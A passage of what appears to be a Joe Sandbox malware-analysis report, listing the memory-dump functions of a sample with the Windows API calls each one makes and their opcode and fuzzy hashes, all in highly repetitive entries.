                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: 226baa4884bd8ac8757a79bb190ac68c3425e7d02ee30ef96c26bf23a7950968
                    • Instruction ID: cb1d0e82774d73f825a298516bc01eef1e62cb852e959d3b6fcab872ff2ce2f5
                    • Opcode Fuzzy Hash: 226baa4884bd8ac8757a79bb190ac68c3425e7d02ee30ef96c26bf23a7950968
                    • Instruction Fuzzy Hash: 2751D862B0924547E724AE66A4006BAF7D1AF44BACF958738DD7D077C5CFBCD40186A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorFileLastWrite
                    • String ID:
                    • API String ID: 442123175-0
                    • Opcode ID: a59a4deeb7d1583818771ec43f3b3d65bc0ba5a8caf124717a6e54d4c4c0e0da
                    • Instruction ID: 1f776432e102c1c7a59c317af647f602d0aa9c19be2464d5a445bc6b16bae685
                    • Opcode Fuzzy Hash: a59a4deeb7d1583818771ec43f3b3d65bc0ba5a8caf124717a6e54d4c4c0e0da
                    • Instruction Fuzzy Hash: 6D31F432B08B8187D710AF15E4406A8B7A0FB08780F894435DE5E83795DF7CE411C790
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                    • String ID:
                    • API String ID: 3548387204-0
                    • Opcode ID: 52c5d3622f53ab46860b0e1a3c6061f5303ee6fca459e950fe332ed877b63895
                    • Instruction ID: f2af780275b9aeca2b8eb402164455cbe8fbac3e511cb0188f0c421b99e4ca93
                    • Opcode Fuzzy Hash: 52c5d3622f53ab46860b0e1a3c6061f5303ee6fca459e950fe332ed877b63895
                    • Instruction Fuzzy Hash: B0119A10F0820302FB1877F0A5662B9D2916F55360FC60439E57DEA6C3EFACB98846F2
                    APIs
                    • SetFilePointerEx.KERNELBASE(?,?,?,?,00000004,00007FF7F1312E4D), ref: 00007FF7F1312D00
                    • GetLastError.KERNEL32(?,?,?,?,00000004,00007FF7F1312E4D), ref: 00007FF7F1312D0A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorFileLastPointer
                    • String ID:
                    • API String ID: 2976181284-0
                    • Opcode ID: 5e790448ec61486aca34e6adc902a885d577137937db7756082ab36af6fd54a7
                    • Instruction ID: 5563a0d3c470b842454e9f10f52d3971378ca37112806ee36fca9f843c696d59
                    • Opcode Fuzzy Hash: 5e790448ec61486aca34e6adc902a885d577137937db7756082ab36af6fd54a7
                    • Instruction Fuzzy Hash: 5911C462A08A8182DB10AB25E804069E761AF45BF4FA44339EE7D1B7D9CFBCD0508790
                    APIs
                    • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7F1313902), ref: 00007FF7F1322D60
                    • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF7F1313902), ref: 00007FF7F1322DCA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: EnvironmentStrings$Free
                    • String ID:
                    • API String ID: 3328510275-0
                    • Opcode ID: c18e4f043843f1c8c634178ac738a3b10062f82bf7080ae00b64191faa204f1e
                    • Instruction ID: a4cd5b8b4d08e32bc5ce86133bd130949019f0890a76b60515e349a924b76de2
                    • Opcode Fuzzy Hash: c18e4f043843f1c8c634178ac738a3b10062f82bf7080ae00b64191faa204f1e
                    • Instruction Fuzzy Hash: 61016521E08B9582EB24BF12641506AA360AF54FE0FC84638DF7D177C9DF7CE44293A0
                    APIs
                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F1303731), ref: 00007FF7F1303853
                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F1303731), ref: 00007FF7F1303869
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Time$System$FileLocalSpecific
                    • String ID:
                    • API String ID: 1707611234-0
                    • Opcode ID: c403bb63c7bc105d04eb971b31d2aa9290b9d6598bcac29245d41400541a5298
                    • Instruction ID: 4c826cbcc0628e00f70bf4193f5b07d5fb3fd797db9e1eb59c540f42ac69d31e
                    • Opcode Fuzzy Hash: c403bb63c7bc105d04eb971b31d2aa9290b9d6598bcac29245d41400541a5298
                    • Instruction Fuzzy Hash: BC11A771A0C65282EB54AB15A41103BFBA0FF81775F900239F6BD819D4DFBCE118DB50
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Gdip$DisposeFreeImage
                    • String ID:
                    • API String ID: 1950503971-0
                    • Opcode ID: 418d43df33912bb62007a859a31320a335d0da39ff2751d50426e60a737c5a6e
                    • Instruction ID: b6cddfa07cba10dbbc052a8e2834357185673d30533145a32b8ad4f7110a64bf
                    • Opcode Fuzzy Hash: 418d43df33912bb62007a859a31320a335d0da39ff2751d50426e60a737c5a6e
                    • Instruction Fuzzy Hash: 95F08231B08A0A86EB507F99F401279A224EF84B50FE48034D66D827D5DF7DE89197D4
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                    • String ID:
                    • API String ID: 1173176844-0
                    • Opcode ID: 1804dbf7969fb847f7d6bbf348b98602dad4ee94b6909257683e72ffbf17d083
                    • Instruction ID: a90e520b6bd3df5992595a8c61d6241e76e2327ac34a094cef68cfc718f8a062
                    • Opcode Fuzzy Hash: 1804dbf7969fb847f7d6bbf348b98602dad4ee94b6909257683e72ffbf17d083
                    • Instruction Fuzzy Hash: 90E0E284F5921B06FF6836E218660B581800F59371FA81B34DE3EC82C7AFDDA49292F4
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: FolderKnownPathwsprintf
                    • String ID:
                    • API String ID: 2574052535-0
                    • Opcode ID: 8c907b8bd7dbc339951842ac878295bdb8fa6fb64b683b1439e7b42c88b9d9b8
                    • Instruction ID: aaf9e0d19c44ef764fe52288358a384b985c62c56c2ae63dca7c9cb13244e22a
                    • Opcode Fuzzy Hash: 8c907b8bd7dbc339951842ac878295bdb8fa6fb64b683b1439e7b42c88b9d9b8
                    • Instruction Fuzzy Hash: C1E09211A18687C3EB087B71E8165B5A330EF4A744FC0103AD62E065C4DF6DE14587A0
                    APIs
                    • RtlFreeHeap.NTDLL(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B6F6
                    • GetLastError.KERNEL32(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B700
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 485612231-0
                    • Opcode ID: 9876fc6d2a4fc134156fbef7c04eef940d3aed9529b01119962373d04f340db5
                    • Instruction ID: c8837d874ea8a83a382ff8339f7242a5e5f132d5cb1d3b49bb1713f9ba2eb9a0
                    • Opcode Fuzzy Hash: 9876fc6d2a4fc134156fbef7c04eef940d3aed9529b01119962373d04f340db5
                    • Instruction Fuzzy Hash: D8E08C12F0824683FF087BB2589407492A19F84710FC8443CD92E872D6EFACB88242F1
                    APIs
                    • CloseHandle.KERNELBASE(?,?,?,00007FF7F131825D,?,?,00000000,00007FF7F13183AA), ref: 00007FF7F13184E6
                    • GetLastError.KERNEL32(?,?,?,00007FF7F131825D,?,?,00000000,00007FF7F13183AA), ref: 00007FF7F13184F0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CloseErrorHandleLast
                    • String ID:
                    • API String ID: 918212764-0
                    • Opcode ID: a2332fd82bbc08fedd6d0a6564ab4cf9e3b0cf670c8cdb366eab35fb93ea7e46
                    • Instruction ID: 234b2dd211d2035a35d91048f6384fca94ae52fd07bfa81cc2098af1bb98d24f
                    • Opcode Fuzzy Hash: a2332fd82bbc08fedd6d0a6564ab4cf9e3b0cf670c8cdb366eab35fb93ea7e46
                    • Instruction Fuzzy Hash: 85219212F0C64242FB64B726A59027D92919F447B4F96427DEA3E663C5CFECA44143A8
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CloseEvent
                    • String ID:
                    • API String ID: 2624557715-0
                    • Opcode ID: 854c2afaaea3994ebbbe71707f3e41989a4e9c7b4e6f6ae24f423ea210e605e5
                    • Instruction ID: 8e4d9681092c9cd9deaaa7efb228465ec06533bebaca9cb81503a4888d226df8
                    • Opcode Fuzzy Hash: 854c2afaaea3994ebbbe71707f3e41989a4e9c7b4e6f6ae24f423ea210e605e5
                    • Instruction Fuzzy Hash: A351B162B1964A81EF11FBA9A4106BDA294FF44B94FC40431DE6D873D6EFBCE441D3A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: 26123bb6969e64c7a3de115a1960137b88b5f7710d6abc6720a2577ae4439594
                    • Instruction ID: 8b77bec41eb2d08289bbedad3d652147131e424272f5aeef2e25d7cae09dbbc0
                    • Opcode Fuzzy Hash: 26123bb6969e64c7a3de115a1960137b88b5f7710d6abc6720a2577ae4439594
                    • Instruction Fuzzy Hash: F1410633D0864247FB28AB15D550279B3A4FF55BA0F954239D6AE536D0CFADE402C7A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: c27f298b55aa4df97cb23475eb850c6411813c1112fa70fe6c76f5fa3a8aa3c8
                    • Instruction ID: 5cd3ba5da1df1c5c0c544657a991460d8ad69bdd17b01339410210601bce58a7
                    • Opcode Fuzzy Hash: c27f298b55aa4df97cb23475eb850c6411813c1112fa70fe6c76f5fa3a8aa3c8
                    • Instruction Fuzzy Hash: 9831AD62E1866687E7117B5588013BCAAA0AF40BB4F86027DD93D133D2DFFCE44183A1
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: HandleModule$AddressFreeLibraryProc
                    • String ID:
                    • API String ID: 3947729631-0
                    • Opcode ID: cc004717d8c0a6ccd53e7ef3e1a4b732e6582a66320545391c874d70e17292c2
                    • Instruction ID: 60293441f45dcc849522579812993da9571d8bc5c6c0f2662e5f1bd9cca514bc
                    • Opcode Fuzzy Hash: cc004717d8c0a6ccd53e7ef3e1a4b732e6582a66320545391c874d70e17292c2
                    • Instruction Fuzzy Hash: 2421A132E147418AEB24AF64C4402EC73A0EF54728F96163DD62C16AC6DFB8D584C7A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Concurrency::cancel_current_task
                    • String ID:
                    • API String ID: 118556049-0
                    • Opcode ID: 320b0776c3176ef96949f349dd5b4aab95e79b259ec639e1b2efcdf1feb51993
                    • Instruction ID: b00800543e67c7db17a6c2762b31e43ad15e3fa73d2c6edf9ca37010e4d81820
                    • Opcode Fuzzy Hash: 320b0776c3176ef96949f349dd5b4aab95e79b259ec639e1b2efcdf1feb51993
                    • Instruction Fuzzy Hash: 8E21D721B0878585EB18BB99E0002FDA294EB44BF0FE44730DA7D83BC5DFBDD4919694
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: 3cdfb9ce0a5c0457b3ef3c427a978d52d93ad49ba0e3567c4a8bb3e195476d21
                    • Instruction ID: 5f3cacfa8a58bd15c7fca3fad11b9b4a0fd310e77c7be1ff60357a15bb1b043d
                    • Opcode Fuzzy Hash: 3cdfb9ce0a5c0457b3ef3c427a978d52d93ad49ba0e3567c4a8bb3e195476d21
                    • Instruction Fuzzy Hash: 2F118721A1C68283EB60BF51950027EE3D0AF96F88FC54039EA6D576C6DFBDD50087A1
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: 9f516fca55b516629e1ebd3e3b8de4f9c110b03db62617cb41f1a81f9117a41b
                    • Instruction ID: eb7f2afb5c658fa886943c8528f3c9b290d0ecc85b98fb4c8b5a07201477e716
                    • Opcode Fuzzy Hash: 9f516fca55b516629e1ebd3e3b8de4f9c110b03db62617cb41f1a81f9117a41b
                    • Instruction Fuzzy Hash: 9421F632A1868287DB61AF28D4403B9F7A0EF84B74F990338EA6D476D9DF7DD4008B50
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: 736d27e5f6f85f456b3b0f46417341afd108be59949c5512090cfb983ef0a459
                    • Instruction ID: 2e8f90383aa006b8d63958bcd927be6e7fd62e893bc8a70983391b78b4dc97fd
                    • Opcode Fuzzy Hash: 736d27e5f6f85f456b3b0f46417341afd108be59949c5512090cfb983ef0a459
                    • Instruction Fuzzy Hash: 19218332A1864687EB61AF28D4403B9B6A0EF84B64F954238EA6D476DADF7DD4008B50
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: 5b40e31a6964f7c3688eaac2442c398391239fe2d98abcc32e069a12843e2109
                    • Instruction ID: ab92410ecd3e9cb3c6be1eac50b446f07090c80f600c4b32b4bce64626db54d0
                    • Opcode Fuzzy Hash: 5b40e31a6964f7c3688eaac2442c398391239fe2d98abcc32e069a12843e2109
                    • Instruction Fuzzy Hash: 4711B721A0C58683FB51BE1598003BED3D0AF51B58F994038EA6C076C6EFACD5408BA0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: c901e11cd3a04162a8545ce054cc31de5e669d2950fe626c252d57100ff7a241
                    • Instruction ID: cd84b4d462874ab02e65dda006ec73d7e46aac563d399e1dfa994d3c6abef08a
                    • Opcode Fuzzy Hash: c901e11cd3a04162a8545ce054cc31de5e669d2950fe626c252d57100ff7a241
                    • Instruction Fuzzy Hash: AE01A92260874282E704EB52A900069E7D4AF95FE4F884635EE7D13BD6DFBCD5414750
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
